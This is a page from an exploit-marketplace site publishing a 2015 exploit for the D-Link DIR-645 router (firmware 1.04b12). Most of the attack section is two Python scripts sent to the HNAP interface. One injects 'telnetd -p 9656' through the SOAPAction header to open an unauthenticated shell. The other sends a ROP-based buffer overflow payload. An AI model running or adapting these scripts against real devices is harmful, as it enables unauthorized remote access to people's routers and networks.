0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
D-link DIR-645 Command Injection - Buffer Overflow Exploit
[# Exploit Title: DIR-645 D-link Command Injection - Buffer Overflow
# Type: Command Injection - Buffer Overflow
# Date: 22/07/2015
# Exploit Author: DNO
# Version: DIR-645 FW 1.04b12
# Tested on: linux "ubuntu"
# CVE : N/A
========================================
about DIR-645
*****************************************
The DIR-645 Wired/Wireless Router contains a flaw that allows a malicious user to cause an overflow (halt in executing application)
in the device software that could allows access to it's operating system and allows unauthenticated commands to be executied.
An additional flaw has been found that allows command injection through it's HNAP interface.
===============
description:
==========
Using firmware in an emulator to determine exploits, the author designed exploit scripts written in python that give details.
"The buffer overflow does not have a payload at this time, however if you watch the exploit in a debugger, then it can be clearly seen that the payload uses ROP techniques to get
to stack payload which is a bunch of C's for now on the stack. It can be replaced with any payload that works on MIPS little endian architecture."
====================
exploit:
==========
*********************************
• Command injection
*********************************
import socket
import struct
buf = "POST /HNAP1/ HTTP/1.0\r\nHOST: 192.168.1.8\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + 'test;telnetd -p 9656;test\r\n' + "1\r\n\r\n"
print "[+] sending buffer size", len(buf)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.90", 80))
s.send(buf)
********************************************
•Buffer overflow
********************************************
import socket
import struct
exploit_buffer = "POST /HNAP1/ HTTP/1.0\r\nHOST: 10.0.0.1\r\nUser-Agent: test\r\nContent-Length: 1\r\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX" + ";pt;"+"B"*158
exploit_buffer+="C"*50+"Z"*46
exploit_buffer+="\xb4\x67\xb3\x2a"
exploit_buffer+="\xd0\xeb\xb4\x2a"
exploit_buffer+="VVVV"
exploit_buffer+="\x7c\xba\xb1\x2a"
exploit_buffer+="K"*16
exploit_buffer+="\x44\x3b\xb0\x2A"
exploit_buffer+="A"*36
exploit_buffer+="\xf0\x5e\xb0\x2A"
exploit_buffer+="H"*16
exploit_buffer+="C"*212+"\r\n" + "1\r\n\r\n"
print "[+] sending exploit_bufferfer size", len(exploit_buffer)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.0.0.1", 80))
s.send(exploit_buffer)
===================================
contact me FB : FB.COM/haker.dyno
Copyright © 2015 /DNO
# 0day.today [2024-10-07] #